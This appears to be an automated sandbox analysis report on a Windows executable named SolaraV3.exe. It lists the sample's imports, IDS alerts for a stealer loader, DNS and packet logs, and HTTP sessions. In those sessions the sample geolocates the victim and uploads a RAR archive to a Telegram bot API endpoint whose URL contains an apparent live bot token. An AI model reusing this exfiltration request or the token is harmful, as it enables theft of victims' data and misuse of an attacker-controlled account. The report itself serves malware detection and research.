                                                                                                                                                                                                                            RT_ICON0x486c00x1281PNG image data, 48 x 48, 8-bit/color RGB, non-interlaced1.002322144817395
                                                                                                                                                                                                                            RT_ICON0x499440x1cdePNG image data, 64 x 64, 8-bit/color RGB, non-interlaced1.00148849797023
                                                                                                                                                                                                                            RT_ICON0x4b6240x5849PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced1.0007079332772886
                                                                                                                                                                                                                            RT_ICON0x50e700x1125ePNG image data, 256 x 256, 8-bit/color RGB, non-interlaced1.000170847689285
                                                                                                                                                                                                                            RT_GROUP_ICON0x620d00x68data0.7692307692307693
                                                                                                                                                                                                                            RT_VERSION0x621380x3a8data0.46260683760683763
                                                                                                                                                                                                                            RT_MANIFEST0x624e00x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                            COMCTL32.dll
                                                                                                                                                                                                                            KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                            2024-10-04T15:33:02.791270+02002857751ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)1192.168.2.749733149.154.167.220443TCP
                                                                                                                                                                                                                            2024-10-04T15:33:04.576286+02002857752ETPRO MALWARE SynthIndi Loader CnC Response1149.154.167.220443192.168.2.749733TCP
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.539729118 CEST4972280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.544846058 CEST8049722208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.544919014 CEST4972280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.545020103 CEST4972280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.550314903 CEST8049722208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:32:22.026937008 CEST8049722208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:32:22.027946949 CEST4972280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:32:22.033832073 CEST8049722208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:32:22.033902884 CEST4972280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.257522106 CEST4973280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.264720917 CEST8049732208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.264801979 CEST4973280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.264930964 CEST4973280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.270106077 CEST8049732208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.922219992 CEST8049732208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.964771986 CEST4973280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.141784906 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.141812086 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.142371893 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.166951895 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.166970968 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.787797928 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.788218021 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.788233042 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.789385080 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.789452076 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.790224075 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.790299892 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.790671110 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.790679932 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.790833950 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.790870905 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.790970087 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791003942 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791136026 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791166067 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791284084 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791299105 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791322947 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791332006 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791342974 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791348934 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791431904 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791444063 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791686058 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791701078 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791759014 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791766882 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791790962 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791807890 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791815042 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791817904 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791837931 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791843891 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791860104 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791929007 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.791946888 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.792005062 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.792026997 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.800950050 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801090956 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801103115 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801117897 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801129103 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801225901 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801235914 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801342964 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801353931 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801359892 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801364899 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801384926 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801460028 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801517963 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801570892 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.801625013 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.805793047 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.805994987 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806005955 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806025028 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806088924 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806107998 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806128025 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806189060 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806536913 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806647062 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806658030 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806675911 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806735992 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806751013 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806797028 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806821108 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.806968927 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807086945 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807099104 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807101011 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807107925 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807153940 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807193995 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807423115 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807431936 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807442904 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.807460070 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.811774969 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.575958014 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.575978041 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.576065063 CEST44349733149.154.167.220192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.576087952 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.576322079 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.576968908 CEST49733443192.168.2.7149.154.167.220
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.592525005 CEST4973280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.598949909 CEST8049732208.95.112.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:04.599019051 CEST4973280192.168.2.7208.95.112.1
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Oct 4, 2024 15:32:19.451195002 CEST5365353192.168.2.71.1.1.1
                                                                                                                                                                                                                            Oct 4, 2024 15:32:19.467767954 CEST53536531.1.1.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.527209044 CEST6016553192.168.2.71.1.1.1
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.535670042 CEST53601651.1.1.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.080598116 CEST5999053192.168.2.71.1.1.1
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.256694078 CEST53599901.1.1.1192.168.2.7
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.134208918 CEST5737253192.168.2.71.1.1.1
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.140866041 CEST53573721.1.1.1192.168.2.7
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Oct 4, 2024 15:32:19.451195002 CEST192.168.2.71.1.1.10xbc5fStandard query (0)blank-a0m8c.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.527209044 CEST192.168.2.71.1.1.10x37d7Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.080598116 CEST192.168.2.71.1.1.10xc2b6Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.134208918 CEST192.168.2.71.1.1.10x90caStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Oct 4, 2024 15:32:19.467767954 CEST1.1.1.1192.168.2.70xbc5fName error (3)blank-a0m8c.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.535670042 CEST1.1.1.1192.168.2.70x37d7No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.256694078 CEST1.1.1.1192.168.2.70xc2b6No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Oct 4, 2024 15:33:02.140866041 CEST1.1.1.1192.168.2.70x90caNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            • api.telegram.org
                                                                                                                                                                                                                            • ip-api.com
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.749722208.95.112.1804892C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Oct 4, 2024 15:32:21.545020103 CEST117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                            Oct 4, 2024 15:32:22.026937008 CEST175INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 04 Oct 2024 13:32:21 GMT
                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                                            Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                            Data Ascii: false


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.749732208.95.112.1804892C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.264930964 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                            Oct 4, 2024 15:33:01.922219992 CEST379INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 04 Oct 2024 13:33:01 GMT
                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 202
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Ttl: 20
                                                                                                                                                                                                                            X-Rl: 43
                                                                                                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                                                                                                                                                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.749733149.154.167.2204434892C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC268OUTPOST /bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument HTTP/1.1
                                                                                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            Content-Length: 727354
                                                                                                                                                                                                                            User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1c1a3fa26118796b784a6413d888e095
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: 2d 2d 31 63 31 61 33 66 61 32 36 31 31 38 37 39 36 62 37 38 34 61 36 34 31 33 64 38 38 38 65 30 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 66 72 6f 6e 74 64 65 73 6b 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 56 9b a9 a7 21 04 00 00 01 0f da 3a 7d 29 aa d8 76 49 05 16 32 b4 92 5a 63 6e 2f 9d 31 dc 80 e7 4b a4 40 25 d7 6a eb cc f5 3d f1 92 f5 f2 53 9a ce 92 1f 58 21 d5 6c ad 98 98 7f 23 90 58 36 eb 91 0b 69 55 e1 cb cf cf a3 11 a9 cf f6 e3 2c 3c a7 19 3c 48 d4 c3 c9 04
                                                                                                                                                                                                                            Data Ascii: --1c1a3fa26118796b784a6413d888e095Content-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!V!:})vI2Zcn/1K@%j=SX!l#X6iU,<<H
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: 48 7a 42 31 8d da bb 3d 30 22 bc 63 3a a7 12 f8 36 e4 67 44 b9 cc 7c b6 1e e1 9f 3f 0f 4b 40 a4 60 6a c3 bf 69 9f c7 c5 0a 78 0f bb 4e 06 3d 3c c4 5a 4a 6e 3e 9d 10 34 e3 2b 4b 30 71 66 ac 23 f6 af 96 9c 23 66 e4 42 f6 6b 34 e3 99 22 a3 2c 0c 88 2b 72 c6 37 81 e9 8d f7 23 ba 0c a6 bc 8b 21 1d 29 0a 93 c5 3e f4 71 23 39 6c 72 9e e3 41 d6 56 ba 9e d1 44 e2 8a e0 c3 de 77 1d dc c6 f6 ba 33 3d c4 66 68 fc 8c 13 55 ac ae ae f0 be d3 da f9 e3 c8 4d ea 03 59 fa e0 fb d3 e2 2a 0f f3 a4 30 95 23 41 16 9b 2d f8 e8 e6 ee 9f 70 bd 97 01 32 30 ed 0a 33 50 51 e8 f9 1e 21 f4 f3 d0 74 94 f8 01 8c fa fd d5 3f 5f 24 0a 7f e9 f1 a6 9b 39 0d 9a 72 02 71 c4 54 96 22 84 fc 70 b4 52 99 75 6a 6f 66 66 86 87 52 2b 56 aa 15 5f 6a f2 1f 69 31 8a 0a 5b 0d 08 84 9a 68 12 18 63 73 60
                                                                                                                                                                                                                            Data Ascii: HzB1=0"c:6gD|?K@`jixN=<ZJn>4+K0qf##fBk4",+r7#!)>q#9lrAVDw3=fhUMY*0#A-p203PQ!t?_$9rqT"pRujoffR+V_ji1[hcs`
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: 52 72 93 d1 ac 8e de 30 e1 6c 1f c6 4d 17 54 ad 76 bf 08 dc e7 22 07 77 c2 21 72 22 90 fc 2e e3 e9 30 7c f6 72 b3 ae b5 25 04 ea b5 27 92 3c 01 a7 b8 bf 73 2f b5 09 03 7d 46 a9 90 b3 0a 77 80 44 03 bb a0 c1 80 ce f0 c4 93 1c 1f b1 d1 e7 9f 68 93 fb 0b cc 31 fd 66 c5 65 c9 a1 ee 3b 9d 47 2c 53 b0 b3 09 5a 1b e0 65 a7 8e 8b e4 49 e3 2e 43 e6 4b 47 09 71 2f 94 4f c4 de 5b 7f 56 bd fa d8 01 c4 9d 44 53 4f df 6a 33 f5 cd ed 8e 6d 02 8f d3 2a 28 a9 15 0e 8a de cb 55 42 6e b8 50 85 17 45 eb 93 08 2b 5a 8d 80 d7 af f6 4e 5b f8 99 6b 70 2c d4 45 31 65 68 45 7f 29 61 03 3a 33 6f 8f 32 36 00 96 e7 c9 96 ff e9 5f c0 66 c3 d4 16 16 21 58 37 4f 49 0e 1c d2 63 e6 f4 a4 74 bd 6a 6d 51 9b 18 a9 09 43 e0 b2 e7 36 81 47 2b b8 35 3d f6 07 76 ef 7b 9f b7 47 73 ab ec 77 a1 9b
                                                                                                                                                                                                                            Data Ascii: Rr0lMTv"w!r".0|r%'<s/}FwDh1fe;G,SZeI.CKGq/O[VDSOj3m*(UBnPE+ZN[kp,E1ehE)a:3o26_f!X7OIctjmQC6G+5=v{Gsw
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: c7 5a 7e cf 60 34 1a 88 a5 bb 87 2e fd cb c1 64 3d bf 36 b4 b4 1e fd 6e c9 de 36 4d bc 37 d9 32 c7 ef 16 4b c3 22 aa ce 16 62 b9 ae 3d bf 5a 73 93 6d da 29 8d 0e 60 1b 85 c4 2d c8 4f 81 67 01 54 43 fe 87 ab 64 16 1e 61 28 ac 4c d2 61 d9 28 b0 aa e5 ab 71 8e 2a 72 9e d0 fb db 04 a2 67 da 12 ba b8 f4 14 4c 28 8c 5c 78 a5 9c 7f 18 71 4c 17 8e ae ae 5a 38 23 f5 a3 f1 5d 14 29 58 ce 2b fe ee 0a 2f 23 25 96 2a 68 a6 e7 aa 79 9d 80 4c a9 6f a6 8a 24 7b c3 ed bc 42 71 ee c4 92 d9 fa a7 e8 8e 02 43 fe ca f7 da 70 ba 24 50 4f d3 42 4a e8 f5 95 bf 9b e8 1d 34 2c e8 07 1f ec ff d5 99 61 4e 28 e5 6d c0 a8 7f 8a 37 2b 3a 43 81 70 be 9e 89 02 83 af f3 c7 1a 10 a3 ec 92 9f a6 a7 42 5a 84 2c 61 cb 9f 74 1d ee ca c7 63 e3 b1 64 85 f8 4a e6 59 fd 65 45 ea 07 2f 0f 58 6e 00
                                                                                                                                                                                                                            Data Ascii: Z~`4.d=6n6M72K"b=Zsm)`-OgTCda(La(q*rgL(\xqLZ8#])X+/#%*hyLo${BqCp$POBJ4,aN(m7+:CpBZ,atcdJYeE/Xn
